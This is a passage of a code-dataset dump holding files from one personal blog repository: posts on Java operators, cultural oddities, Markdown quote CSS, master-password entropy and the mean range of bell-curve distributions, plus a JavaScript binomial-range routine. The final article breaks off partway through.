this issue. Wait, my mistake: it still is!\nThere are those \"primitive data types\" like `int` and arrays that you cannot subclass. These troublesome builtins were such a thorn under programmers' feet that they wrote [class equivalents](http://download.oracle.com/javase/tutorial/java/data/numberclasses.html) and extraterrestrial things such as `BigDecimal`!\nBut operators don't work on them.\n\nOperators make built-in types forever special.\n\nI understand the purpose of operators.\nThey make maths look like maths.\nOtherwise, they are completely useless.\nBut still, they also make builtins more special than your own code! That is *not nice*!\n\nIn turn, why did maths do this?\nThey had a functional notation that was a perfect fit.\nIt turns out that infix notation is one inch shorter. Yes, one inch is the size of two parentheses and a comma. At least on a blackboard.\n\nThe associativity properties of some operators meant that we could chain operations together without caring about bracketing them.\n\nMathematicians pushed wrist laziness as far as to devise a way to remove even more parentheses. They chained non-associative operations such as addition and multiplication. They invented precedence. May God forgive us.\n\nDoes that mean that arithmetic should forever be special?\nLisp proves that there are other ways.\nYou can make operators behave just like functions.\nYou can refuse precedence.\nYou might have every mathematician throwing rocks at you for the rest of your life, though, when they realize that `1 + 2 * 4` is a syntax error. At least it doesn't yield 12.\n\nYou can also have faith in your users. You can expect them to use operators for arithmetic only. You can hope that they won't use `+` for string concatenation.\n\nJava, on the other hand, has no faith in its users. Wise decision.\nBy expecting Java programmers to be dumb, they attracted exactly that portion of the programming world. (Mind you, they attracted wise people, too.)\n\nWhat I meant to do by writing this article is to make you aware of the fact that your programming tools behave counter-intuitively.\n\nI have yet to see a consistent and productive programming language.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2011-08-30T19:54:00Z\",\n \"keywords\": \"js, go\" }\n</script>\n"
},
{
"alpha_fraction": 0.7805212736129761,
"alphanum_fraction": 0.7849108576774597,
"avg_line_length": 78.23912811279297,
"blob_id": "66ad73cec651a564d5c2aa06a148274f1afd4403",
"content_id": "c332345f14445089344095103c6820067e6ac9e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3646,
"license_type": "no_license",
"max_line_length": 561,
"num_lines": 46,
"path": "/blog/src/outdated-culture.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Outdated Culture\n\nI have been enjoying the bits of the series \"Adam Ruins Everything\" that I could watch online. So far, here is what he has addressed:\n\n- Diamond engagement rings were declining in popularity but the diamond cartel De Beers made an extensive ad campaign to convince everyone that they needed expensive rings for engagements\n- Circumcision has weird cultural origins and no health benefits\n- Purebread dogs are not healthy\n- Tipping is an unethical revenue stream uncorrelated to quality of service\n- Donating shoes to poor countries (thus destroying the local shoemaker's jobs, while missing the point, as they could already buy shoes)\n- Magnetic credit cards' poor security against fraud (compared to [EMV][] in Europe, anyway)\n- TSA security theater (you don't know this about me, but I've never been to the US without finding a card in my luggage saying it had been searched. Last time I went, I waited a month to get my luggage back)\n- Anti-competitive car dealership laws\n- How Jaywalking became a crime when originally, streets were meant to walk on (hint, car manufacturers had lobbies)\n- The error rate of lie detectors and fingerprint comparisons\n- Food coloring\n- Wine tasting error rate\n- Listerine false advertising\n- Gerrymandering in the US\n- The rationality of not talking about salary\n- Disney changed public domain laws to milk their old copyrights\n- Hymens don't break, virginity is a lie\n\n[EMV]: https://en.wikipedia.org/wiki/EMV\n\nThat's already a long list, but the show is fairly young!\n\nA number of the crazy things that Adam debunks are cultural and only appear in the US, such as tipping, jaywalking or magnetic credit cards. (Also, how is your ID a driver's license?) That made me wonder how fast I could come up with other things that are absurd in the French experience.\n\nFrance tends to be considered as rational, but there is still plenty of superstition, xenophobia, nationalism, and of course, political corruption (even though much less extensively than in the US). There's a ton of stupid things like yoghurt being advertised as a medical cure, speed detectors on roads being marked up on cars' GPS trackers to warn drivers (forcing them to be distracted), homeopathy being sold by pharmacies, and the awful impact of christian extremism in schools leading to absurd amounts of teen pregnancies, health illiteracy and misogyny.\n\nI didn't even mention how wine is seen as French, but in the 19th century, an imported American disease [destroyed][Blight] all the French vines and they were all grafted with American ones, so they're not really authentic anymore (well, technically, the American ones were imported from France in the first place, but the DNA got mixed up so much that the struggle for authenticity and labels such as AOC is ridiculous anyway).\n\n[Blight]: https://en.wikipedia.org/wiki/Great_French_Wine_Blight\n\nWhat do I forget? Oh, yes, the twisted French elitism ensures that top schools (which are NOT UNIVERSITIES because Napoléon) and companies accept children of people that went there more readily. Finally, there's a weird and all-too-common sexual mutilation performed on women called \"point du mari\" that reduces the diameter of their vagina, often without their consentment as a surgery after they had a baby.\n\nOn a lighter note, matadors (you know, the performers who turn animal cruelty into entertainment?) are still a thing in southern France.\n\nBut hey, at least we don't believe in fan death!\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2015-12-12T20:15:00Z\",\n \"keywords\": \"\" }\n</script>\n"
},
{
"alpha_fraction": 0.5975790619850159,
"alphanum_fraction": 0.625,
"avg_line_length": 36.13761520385742,
"blob_id": "1cf0b32fdb62544f675a7d242366e1e1c1e97b41",
"content_id": "10a2b28c08ff7c31122db88d722869097867784c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 4050,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 109,
"path": "/blog/assets/mean-range-of-a-bell-curve-distribution/binomial-mean-range.js",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "// Compute the mean range and its extrema for a Binomial distribution.\n//\n// This code depends on https://github.com/cag/mp-wasm.\n\n// Compute the range of a binomial distribution.\n// In other words, the max and min of the set of likely (≥ `prob`) values\n// of the number of positive events among `events` independent attempts\n// that go positive with probability `posprob`,\n// when that set is constituted of `samples` independently obtained numbers\n// (of positive events among `event` attempts).\nfunction binomialRange(events, posprob, samples, prob = .5, mpf = this.mpf) {\n const n = mpf(events);\n const p = mpf(posprob);\n const g = mpf(prob);\n const pi = mpf.getPi();\n if (p.isNaN() || !p.isFinite()) {\n return { min: 0, max: 0, range: 0, iterations: 0 };\n }\n const targetProb = mpf(1).sub(mpf(1).sub(g)\n .pow(mpf(1).div(mpf(samples))));\n let min, max; // What we are searching for.\n\n // Track lower and upper bounds to the range.\n const mean = n.mul(p), variance = mean.mul(mpf(1).sub(p));\n let lowMin = mpf(0); // Pr(lowMin) <= targetProb.\n let highMin = mean.floor(); // Must always be Pr(highMin) > targetProb.\n let lowMax = mean.ceil(); // Must always be Pr(lowMax) > targetProb.\n let highMax = n; // Pr(highMax) <= targetProb.\n let steps = 0;\n\n let approxMean = mean;\n for (;;) {\n steps++;\n let normal = normalRange(approxMean, variance, samples, prob, mpf);\n let curMax = normal.max.ceil();\n // Compute the actual probability at that estimation.\n let curProb = binomialProb(curMax, n, p, mpf);\n // Update the approximate mean\n // to get the normal curve to track the binomial one.\n approxMean = curMax.sub(mpf.sqrt(\n variance.mul(-2).mul(mpf.log(curProb.mul(\n mpf.sqrt(variance.mul(2).mul(pi)))))));\n // Check that we are not stuck on a value.\n if (curMax.lte(lowMax) || curMax.gte(highMax) || curMax.isNaN()) {\n // Use binary search instead.\n curMax = lowMax.div(2).add(highMax.div(2)).floor();\n curProb = binomialProb(curMax, n, p, mpf);\n }\n // Update the bounds.\n if (curProb.gt(targetProb)) {\n lowMax = curMax;\n } else {\n highMax = curMax;\n }\n if (highMax.sub(lowMax).lte(1)) {\n max = lowMax;\n break;\n }\n }\n\n approxMean = mean;\n for (;;) {\n let normal = normalRange(approxMean, variance, samples, prob, mpf);\n let curMin = normal.min.ceil();\n // Compute the actual probability at that estimation.\n let curProb = binomialProb(curMin, n, p, mpf);\n // Update the approximate mean\n // to get the normal curve to track the binomial one.\n approxMean = curMin.add(mpf.sqrt(\n variance.mul(-2).mul(mpf.log(curProb.mul(\n mpf.sqrt(variance.mul(2).mul(pi)))))));\n // Check that we are not stuck on a value.\n if (curMin.lte(lowMin) || curMin.gte(highMin) || curMin.isNaN()) {\n // Use binary search instead.\n curMin = lowMin.div(2).add(highMin.div(2)).floor();\n curProb = binomialProb(curMin, n, p, mpf);\n }\n // Update the bounds.\n if (curProb.gt(targetProb)) {\n highMin = curMin;\n } else {\n lowMin = curMin;\n }\n if (highMin.sub(lowMin).lte(1)) {\n min = highMin;\n break;\n }\n }\n\n // Binary search: (2^128,2^-128,2^128): 128; (2^256,2^-128,2^256): 256\n // Newton method: (2^128,2^-128,2^128): 128; (2^256,2^-128,2^256): 256\n // Interp search: (2^128,2^-128,2^128): 8; (2^256,2^-128,2^256): 8\n\n return { min, max, range: max.sub(min), iterations: steps };\n}\n\n// Compute the probability mass function of a binomial distribution B(n, p),\n// at the point k.\n// In other words, it is the probability of getting k positives,\n// when running n independent trials that go positive with probability p.\nfunction binomialProb(k, n, p, mpf = this.mpf) {\n k = mpf(k); n = mpf(n); p = mpf(p);\n const logFactors = mpf.lngamma(n.add(1))\n .sub(mpf.lngamma(k.add(1)))\n .sub(mpf.lngamma(n.sub(k).add(1)))\n .add(k.mul(mpf.log(p)))\n .add(n.sub(k).mul(mpf.log(mpf(1).sub(p))));\n return mpf.exp(logFactors);\n}\n"
},
{
"alpha_fraction": 0.7051950097084045,
"alphanum_fraction": 0.7548085451126099,
"avg_line_length": 51.48113250732422,
"blob_id": "98095228c65e0dde0ac8421aea430893961b2878",
"content_id": "a411710a691a6610b63d9c69ce9007dd724ea73c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5571,
"license_type": "no_license",
"max_line_length": 353,
"num_lines": 106,
"path": "/blog/src/markdown-quote-styling.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Markdown Quote Styling\n\n\n\nAfter four iterations, I am finally happy with the rendering I have for Markdown quotes.\n\n_(You can see an example of one [in this example page](https://thefiletree.com/demo/markdown.md?plug=markdown). The CSS is [here](https://github.com/espadrine/plugs/blob/master/lib/css/markdown.css). If you don’t like reading, I made a [video](https://youtu.be/DNbhgWHPGbQ).)_\n\n## Plain border\n\nThe most straightforward implementation is as a dumb **border on the left**.\n> .markdown blockquote {\n> margin: 0;\n> padding-left: 1.4rem;\n> border-left: 4px solid #dadada;\n> }\n\nIt swiftly provides a good approximation of what I wanted it to look like.\n\n\nHowever, the edges of that border are very sharp. How should we round them?\n\nA border radius would only work on the left edges, not the right ones. We have to get creative.\n\n## Bitmap border image\n\nCSS provides a **border-image** property. Given an image that roughly pictures a square, it can map the top left part of the image to the top left edge of the border, the middle top part to the middle top border, and so on.\n\nIt is flexible enough that we can cheat: we can set it to map the whole picture to the left part of the border.\n> border-style: solid;\n> border-width: 2px 0 2px 4px;\n> border-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAQAAAAFCAYAAABirU3bAAAAOklEQVQI103IQQ2AMBjF4G+/DPCEjiXYwdnTMEAGB3ZYkx7aluTA5edsSQa2OUYtAXvhWcZd6Hin/QOIPwzOiksIkAAAAABJRU5ErkJggg==) 2 0 2 4;\n\nA disadvantage of that approach is that it forces us to have two pixels of invisible border at the top and at the bottom, corresponding to the two pixels of rounded corner in the image.\n\nThat, in turn, forces the paragraph’s margin inside of the blockquote (instead of collapsing with the previous paragraph’s margin), which requires adding a bit of code:\n> .markdown blockquote :first-child {\n> margin-top: 0;\n> }\n> .markdown blockquote :last-child {\n> margin-bottom: 0;\n> }\n\nThat is not overwhelming.\n\nHowever, now, there is a bit of space at the top and at the bottom of the blockquote, for no good reason.\n\n\n## Gradient border image\n\nInstead of using a bitmap image, we can rely on a **radial gradient** to generate an ellipse. We can use the border-image parameters to cut almost all of the upper part of the ellipse so that it gets mapped to the top left corner of the border, and similarly for the bottom left, leaving a slim band at the center of the ellipse that will get stretched.\n> border-image: radial-gradient(2px 50% ellipse at 2px 50%, #dadada, #dadada 98%, transparent) 45% 0 45% 4;\n\nThe disadvantage of this approach is that the rounded edge is pixelized, not antialiased.\n\n\nBesides, it doesn’t get rid of the top and bottom space.\n\nWe could, however, remove the top and bottom part of the border-image. Then, we would directly see the ellipse on the left.\n> border-image: radial-gradient(2px 50% ellipse at 2px 50%, lightgray, lightgray 98%, transparent) 15% 0 15% 4;\n\nHowever, the border would then look different (and stretched) depending on the height of the blockquote.\n\n\n## Before pseudo-element\n\nOne last hope is to rely on the ::before pseudo-element. We can style it as if it was a block, and make it float on the left.\n> .markdown blockquote::before {\n> content: '';\n> display: block;\n> float: left;\n> width: 4px;\n> height: 4em;\n> margin-right: 1.2rem;\n> background: #dadada;\n> border-radius: 2px;\n> }\n\nHowever, we lose any height information. We cannot put a height of 100%, as that is still 0. We have no connection to the blockquote.\n\nBut it turns out we can force one to be created. All we need is a common trick: we force the blockquote (the parent element) to have a relative position, and force the ::before (the child) to have an absolute position.\n> .markdown blockquote::before {\n> content: '';\n> position: absolute;\n> left: 0;\n> width: 4px;\n> height: 100%;\n> background: #dadada;\n> border-radius: 2px / 4px;\n> }\n\nThen, as if by magic, our 100% height matches our intention.\n\n\nAs an aside, I was not completely satisfied by the 2 pixel border-radius, as it still looked a bit sharp. However, a 2px / 4px gave outstanding results.\n\nIn conclusion, with a bit of trickery, we can render markdown as nicely as we want, without changing the HTML produced by standard tools.\n\nHere is the CSS file I now use: [https://github.com/espadrine/plugs/blob/master/lib/css/markdown.css](https://github.com/espadrine/plugs/blob/master/lib/css/markdown.css). A demo of that file is available here: [https://thefiletree.com/demo/markdown.md?plug=markdown](https://thefiletree.com/demo/markdown.md?plug=markdown).\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2016-03-05T17:06:00Z\",\n \"keywords\": \"markdown, css\" }\n</script>\n"
},
{
"alpha_fraction": 0.7649750113487244,
"alphanum_fraction": 0.7847033739089966,
"avg_line_length": 45.32450485229492,
"blob_id": "8bb3c364010a3543a7022d471c7537b4ad7e4b6a",
"content_id": "acebe054d8d7259f9432b2af7b5977b14b31037c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7029,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 151,
"path": "/blog/src/memorable-passwords.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Memorable passwords\n\nWe are slowly getting to a comfortable password situation.\n\nResearch has improved on which passwords are easier to remember.\nCryptographers have [strenghtened the cost][Argon2-KDF] of cracking weak passwords.\nPeople are more aware of the security risks,\nand the usage of password managers grows.\n\nThe consensus on password handling is this:\n\n1. Keep a very strong master password in your head, stored nowhere.\n2. Use it to unlock your password manager.\n3. Use your password manager to store and create very random passwords for individual websites.\n You would never be able to remember them, but you only need to remember the master password.\n Typically, for alphanumerical outputs, you need ⌈128÷log2(26·2+10)⌉ = 22 characters.\n4. The websites, and more importantly, the password manager,\n use a key derivation function such as [Argon2][Argon2-KDF] either on the front-end\n (server relief) or on the backend, and only stores the output.\n It ensures computation is both time-hard and memory-hard, with settings kept up-to-date\n to ensure that each computation takes 0.5 seconds and/or 4 GB of RAM.\n\nBut some details are left unset: exactly how strong should the master password be?\nHow do we even know?\nCan this situation converge to an easier user experience for login on the Web?\n\n## Password hashing\n\nSome accurate statements may be surprising to the general population.\nThis is one:\n\n**Multiple passwords can unlock your account.**\n\nThe reason? Your password is not compared byte-for-byte (thankfully!)\nbut through a hashing method that does not map one-to-one.\n\nIndeed, hashes have fixed sizes (typically 256 bits),\nwhile passwords have arbitrary length.\n\nOverall, this consideration is unimportant,\nbecause virtually no password is strong enough\nto even compete with the collision risk of the hash:\nit is tremendously more likely for a collision to be caused by\nthe generation process, than by the hash,\nwhose collision risk is 2<sup>N÷2</sup>\nwhere N is the size of the hash, typically 256 bits nowadays.\n\nOn top of this, some companies build their login system\nin a way that is more resilient to user error,\nsuch as [having caps lock on][Facebook passwords].\n\nThat too is irrelevant, since the search space is typically only reduced\nby one bit (corresponding to the choice between setting caps lock or not).\n\n## Target strength\n\n[Some suggestions target specific cryptographic algorithms][StackOverflow strength suggestion].\nBut this pushes machine limits into human constraints:\nalgorithms require 128-bit security, not because 127 is not enough,\nbut because it is a power of two that neatly fits with various engineering techniques.\n\nThe real human constraint is your lifetime.\nOnce you are dead, it does not matter too much to your brain whether your secrets are out,\nsince your brain becomes mulch.\n\nThe longest person alive is a French woman that died nearly reaching 123.\nLet’s imagine that health will improve\nsuch that someone will live double that amount, Y = 246 years.\nWhat is the minimum strength needed to ensure they won’t have their secrets cracked alive?\n\nCurrent compute costs hover around €3/month on low-end machines.\nLet’s imagine that it will improve a hundredfold in the coming century.\n\nThe NSA yearly budget is estimated at B = €10 billion.\nCan they hack you before you die?\n\nFirst, under those assumptions,\nassuming the NSA consumes its whole budget cracking you,\nhow many computers will it use to crack you in parallel?\nThe result is P = B ÷ 12 ÷ 0.03 = 28 billion servers.\n\nIf your password has an N-bit entropy,\nit will take 2<sup>N-1</sup>·0.005÷P÷3600÷24÷365 years on average,\nassuming the NSA is brute-forcing with CPUs that can do one attempt every 5 milliseconds\n(a hundredth of the [Argon2][Argon2-KDF] recommended setting,\nto account for the possibility that the NSA has machines a hundred times more powerful\nthan the rest of us, which is both unlikely, and would not cost what we estimated).\n\nAs a result, our formula for picking strength is\nN = log2(B÷12÷0.03 · Y·365·24·3600÷0.005) + 1 = 77 bits of security.\n\nNote that we can assume that a good KDF is used,\nsince we are only worried about password strength for the password manager,\nwhich should be pretty good at choosing the right design.\nThe password manager will generate all normal passwords above 128 bits of security anyway.\n(Except for those pesky websites that inexplicably have an upper password length limit.\nBut those are beyond saving.)\n\nI parameterized some values so that you can plug your own situation.\nFor instance, if you make a password for your startup\nthat you believe will beat the odds of an average 5-year lifespan,\nand become a behemoth a thousand years into the future, you can set Y = 1000\nand get a very slight increase to 79 bits.\n\nIf you instead believe that your adversary will spend a trillion euros every year,\nyou can bump things up to 83 bits of security.\n\n## Master password generation\n\nHow do you convert a number of bits of security into a master password?\nWell, those bits represent the amount of entropy of the random generator.\nOr in other words, the quantity of uncertainty of the password-making process.\n\nEach bit represents one truly random choice between two options.\nIf you have four options, it is as if you made two choices, and so on.\n\nA good way to make memorable master passwords is to pick words among large dictionaries,\nsince picking from a long list adds a lot of entropy (since there are so many binary choices)\nbut each word is very distinctively evocative.\n\nHowever, each word is independent, and therefore,\nmaking stories in your head that combines those words gets harder the more words there are.\nSo we randomize the word separators as symbols,\nwhich both adds entropy (so that we can have less words),\nand is not too hard to remember. Besides, breaking words apart ensures that\nwe don’t lose entropy by ending up with two words that, concatenated,\nare actually a single word from the same dictionary.\n\nI implemented these principles on [this passphrase generation page][passphrase].\n\n## Thank you, Next\n\nI feel strongly that passwords are passé.\nI would love to talk about my hopes for the future of Web authentication.\n\n[Reddit comments here][].\n[HN comments here][].\n\n[Argon2-KDF]: https://password-hashing.net/argon2-specs.pdf\n[Facebook passwords]: https://www.zdnet.com/article/facebook-passwords-are-not-case-sensitive-update\n[StackOverflow strength suggestion]: https://crypto.stackexchange.com/questions/60815/recommended-minimum-entropy-for-online-passwords-in-2018\n[passphrase]: https://espadrine.github.io/passphrase/\n[Reddit comments here]: https://www.reddit.com/r/programming/comments/hf63bp/generate_cryptographically_secure_passphrases_at/\n[HN comments here]: https://news.ycombinator.com/item?id=23632533\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2020-06-24T19:50:27Z\",\n \"keywords\": \"crypto\" }\n</script>\n"
},
{
"alpha_fraction": 0.6915057897567749,
"alphanum_fraction": 0.7219858765602112,
"avg_line_length": 37.26654815673828,
"blob_id": "a4da409404e2cbd0111431380ec087b4c8488ecc",
"content_id": "7b168d9dd19060fcd546c0d910c11cb82b289962",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 21416,
"license_type": "no_license",
"max_line_length": 175,
"num_lines": 559,
"path": "/blog/src/mean-range-of-bell-curve-distributions.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Mean Range of Bell Curve Distributions\n\n**Abstract:**\nWhen sampling several data points from a known statistical distribution,\na valuable indication of the spread is the range of the set of values obtained.\nSince the sampling is probabilistic,\nthe best estimate we can hope for is the expected value of the range.\nThat mean range,\nalong with the expected maximum and minimum values of the sampling set,\nare traditionally difficult to compute with existing means.\nWe present a method to perform that computation,\nand its implications on the correct computation of the balls-into-bins problem.\n\n<style>\n.ballsIntoBins {\n width: 90%;\n margin: auto;\n padding: .6em 2em;\n border: 1px solid lightgray;\n border-radius: 50px;\n background-color: #fafaff;\n}\n.ballsIntoBins p {\n text-align: center;\n}\n.ballsIntoBins input {\n width: 7ex;\n}\noutput { word-break: break-all; }\n</style>\n<div class=ballsIntoBins>\n <p> Randomly placing this number of balls:\n <input id=ballsInput value='2^128'>\n = <output id=ballsOutput>340282366920938463463374607431768211456</output>,\n <br> in this number of bins:\n <input id=binsInput value='2^128'>\n = <output id=binsOutput>340282366920938463463374607431768211456</output>,\n <br> causes the least filled bin to contain\n <output id=minOutput>0</output>\n balls, whilst the most filled bin contains\n <output id=maxOutput>33</output>\n balls, which is\n <output id=rangeOutput>33</output>\n more.\n <p id=ballsErrors>\n</div>\n\n**Introduction:**\nCurrently, there does not seem to be any exact, computable formula\nfor the expected range of obtaining samples from a distribution.\nThe [best known formula][Har54] is:\n\n```latex\nn \\int_{0}^{1} x(G)[G^{n-1} - (1-G)^{n-1}] \\, \\mathrm{d}G\n```\n\nwhich requires integrating with respect to the the inversed distribution.\n\nIn the case of discrete random variables, such as the Binomial distribution,\n[a solution can be computed in a finite number of steps][Abd54]:\n$`\\sum_{x=1}^{N-t} [G(x+t)-G(x-1)]^n - [G(x+t)-G(x)]^n - [G(x+t-1)-G(x-1)]^n + [G(x+t-1)-G(x)]^n, t > 0`.\n\nHowever, the number of iterations scales with $`n`,\nand I wish to compute exact results for values of $`n`\nthat cannot be iterated through within the timespan of the universe,\nsuch as $`n = 2^{256}`.\n\nAs a consequence,\n[solving the problem of the balls into bins is done inexactly][Gon81],\nthrough approximations such as $`\\frac{\\log(n)}{\\log(\\log(n))}`.\nWe wish to compute exact results here.\n\n## 1. Generic Derivation\n\nConsider a distribution with probability density function $`\\varphi`.\nIts associated random variable, $`X`, can be either real-valued or discrete.\n\nWe observe a sample of $`N` independent values taken from that distribution.\n\nThe question we ask is:\nWhat is the range of values that have a probability ≥ $`\\gamma`\n(across samplings of $`N` values) of appearing in the sample?\nFor instance, for a mean range, one would pick $`\\gamma = \\frac{1}{2}`.\n\nDespite being potentially continuous, we can research the probability\nthat a given value appears at least once in the sample.\nThat is $`1 - P_{excluded}`, where $`P_{excluded}` is the probability\nthat the value does not appear in the sample.\n\nIn turn, given that the sample is independently drawn each time,\nthe probability that a value is not drawn once,\nis $`P_{excluded} = (1 - \\varphi(x))^N`.\n\nThus, the probability that a given value is in the sample,\nis $`1 - (1 - \\varphi(x))^N`.\nBy definition, that probability is equal to $`\\gamma`.\n\nWe can therefore derive that the values $`x` that are in range,\nfollow the equation:\n\n```latex\n\\varphi(x) \\geq 1 - \\sqrt[N]{1 - \\gamma}\n```\n\nWhen $`\\varphi` is a bell curve distribution,\nthe corresponding equality has two solutions for $`x`.\n\n## 2. Application to the Normal\n\nSome bell distributions are more easily invertible.\nThankfully, *this is true of the Normal distribution*,\nwhich will enable us to produce good estimations for all distributions,\nthanks to the **central limit theorem**.\n\nFirst, let us derive the exact Normal solution.\nWe have $`\\varphi(x) : \\mathcal{N}(\\mu, \\sigma^2)`:\n\n```latex\n\\varphi(x) = \\frac{e^{-\\frac{(x-\\mu)^2}{2\\sigma^2}}}{\\sqrt{2\\sigma^2\\pi}}\n```\n\nThus the solution to the general inequality is:\n\n```latex\nx \\in \\left[\n \\mu \\pm \\sqrt{-2\\sigma^2\n \\ln(\\sqrt{2\\sigma^2\\pi}(1-\\sqrt[N]{1-\\gamma}))}\n\\right]\n```\n\nFrom this, we can compute the maximum and minimum exactly,\nalong with the mean range, which follows this formula:\n\n```latex\n2\\sqrt{-2\\sigma^2 \\ln(\\sqrt{2\\sigma^2\\pi}(1-\\sqrt[N]{1-\\gamma}))}\n```\n\n## 3. Application to the Binomial\n\nThe PDF of a binomial distribution $`\\beta(x) : \\mathcal{B}(m, p)`,\nthe probability of a number $`x` of positive events\namong $`m` events with probability $`p` of positivity,\nfollows this equation:\n\n```latex\n\\beta(x) = {m \\choose x} p^x (1-p)^{m-x}\n```\n\nWhile $`x` is a discrete integer,\nthe distribution of $`\\mathcal{B}(m, p)` is also bell-shaped.\nThus the generic derivation above can also be applied.\n\nTwo issues arise when using that derivation, however:\n\n- Unlike the Normal, the binomial coefficient cannot be elegantly **inverted**,\n which prevents us from producing an exact formula.\n- For large values of $`m - x` (around $`2^{128}`),\n calculating that binomial coefficient exactly\n is **too computationally expensive** to yield a result within a lifetime.\n\nWe can however devise an algorithmic method\nby which we obtain an exact answer regardless.\n\nThe first issue can be solved by computing $`\\beta(x)` for all values of $`x`\nuntil the bell curve plummets back below $`\\tau = 1-\\sqrt[N]{1-\\gamma}`.\nHowever, that method is impractical when $`x_{max}` is too large.\n\nInstead of going through each value of $`x`,\nour algorithm can search for the right value\nthrough increasingly accurate approximations,\nsimilar to the way Newton’s method works.\n\nThis convergence works by:\n\n1. Using the best model we have of the distribution,\n2. Gathering information from the estimated root,\n3. Updating the model to be even more precise,\n4. Iterating, similar to an interpolation search,\n until eventually, we find two consecutive integers\n $`x_{max}` and $`x_{max}+1` where the first is above the limit\n (obtained from the generic derivation),\n and the other is not.\n\nThe two challenges in implementing this algorithm are:\n\n- Problem 1: Evaluating $`\\beta(x)` is too expensive for large $`x`\n using integer arithmetic operations,\n- Problem 2: Establishing a good and computable model for the distribution,\n and updating it in such a way that ensures eventual and fast convergence.\n\n### 3.1. Evaluating the PDF\n\nWe use the classic solution:\nfirst, convert the binomial coefficient formula to use the Gamma function.\n\n```latex\n\\beta(x) = \\frac{\\Gamma(m+1)}{\\Gamma(x+1)\\Gamma(m-x+1)} p^x (1-p)^{m-x}\n```\n\nThen, to avoid handling large gamma results,\nwe rely on an exact computation of the log-gamma.\nWe can use an arbitrary-precision library\nto ensure we get an error below the integer result we end up with.\n(To find the right precision to set for the algorithm,\nwe can rely on exponential binary search.)\n\n```latex\n\\beta(x) = e^{\n \\ln\\Gamma(m+1) - \\ln\\Gamma(x+1) - \\ln\\Gamma(m-x+1)\n + x \\ln(p) + (m-x) \\ln(1-p)\n}\n```\n\n### 3.2. Converging to the range extrema\n\nGiven the shape of the PDF, and its reflectional symmetry,\nwe can *bound* the expected maximum sample to be between the mean\nand the end of the curve.\n\n```latex\nmp \\leq x_{max} \\leq m\n```\n\nWe set those bounds as $`x_{low}` and $`x_{high}`,\nand estimate the value of $`x_{max}` from its Gaussian approximation:\n\n```latex\n\\hat{x}_{max} = \\left\\lceil\n mp + \\sqrt{-2mp(1-p)\n \\ln(\\sqrt{2mp(1-p)\\pi}(1-\\sqrt[N]{1-\\gamma}))}\n \\right\\rceil\n```\n\nWe can then compute the accurate value of $`\\beta(\\hat{x}_{max})`.\nIf that value is below $`\\tau`, we are too far:\nwe set the upper bound $`x_{high}` to our $`\\hat{x}_{max}` estimate.\nOtherwise, we set $`x_{low}` to it instead.\n\n<figure>\n <img alt='Plot of overlaid Binomial and Normal distributions'\n src='../assets/mean-range-of-a-bell-curve-distribution/binomial-normal-range.svg'>\n <figcaption><p>Plot of 𝔅(200, 10<sup>-1</sup>) in red,\n and its approximating Gaussian in blue.\n τ is shown in green.\n Note how the Normal approximation is off by one on the minimum,\n but the shape of its curve is a good fit locally,\n apart from being horizontally off.\n </figcaption>\n</figure>\n\nThen, we must **improve our estimated model**.\n\n*Newton’s method* is insufficient,\nbecause it does not guarantee convergence,\nand because its convergence is comparatively slow\nas a result of the flatness of the curve.\n\n*Binary search*, taking the average of $`x_{low}` and $`x_{high}`,\nproduces a reliable convergence in $`O(\\log(m))`,\nbut it does not use our existing knowledge of the shape of the curve.\n\nThe normal curve is quite a good approximation,\nespecially with large values.\n(With small values, the convergence is fast anyway.)\n\nHowever, past the first estimation,\nthe normal curve is too far from where the binomial curve intersects $`\\tau`.\nThus we must slide it, either to the left or to the right,\nso that it coincides laterally\nwith the real point $`\\{\\hat{x}_{max}, \\beta(\\hat{x}_{max})\\}`\nwhose abscissa is an estimate of $`x_{max}`.\n\nThat new curve is another Gaussian distribution,\nwith a mean that solves the equation\n$`\\varphi_{\\mu, \\sigma^2}(\\hat{x}_{max}) = \\beta(\\hat{x}_{max})`:\n\n```latex\n\\mu = \\hat{x}_{max} - \\sqrt{-2\\sigma^2\\ln(\n \\beta(\\hat{x}_{max})\n \\sqrt{2\\sigma^2\\pi}\n )}\n```\n\nHowever, there is no guarantee that it will intersect $`\\tau`\nbetween $`x_{low}` and $`x_{high}`.\nAs a fallback, if it is out of bounds, we ignore the normal estimate\nand use the average of $`x_{low}` and $`x_{high}`,\njust like binary search.\n\nOnce the bounds $`x_{low}` and $`x_{high}`\nhave converged into adjacent integers,\nwe have found $`x_{max} = x_{low}`.\n\nAs for $`x_{min}`, the process is symmetrically identical,\nexcept it occurs within the bounds:\n\n```latex\n0 \\leq x_{min} \\leq mp\n```\n\nand using the following, reminiscent mean update:\n\n```latex\n\\mu = \\hat{x}_{min} + \\sqrt{-2\\sigma^2\\ln(\n \\beta(\\hat{x}_{min})\n \\sqrt{2\\sigma^2\\pi}\n )}\n```\n\nThe algorithmic complexity of the convergence is in $`O(\\log(m))` worst-case,\ndegrading to binary search, but is empirically $`O(\\log(\\log(m)))` on average:\n\n\n<figure>\n <img alt='Plot of iteration count'\n 